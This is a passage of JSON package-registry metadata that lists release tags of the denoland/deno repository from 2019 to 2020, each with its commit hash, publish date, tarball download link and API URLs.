0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54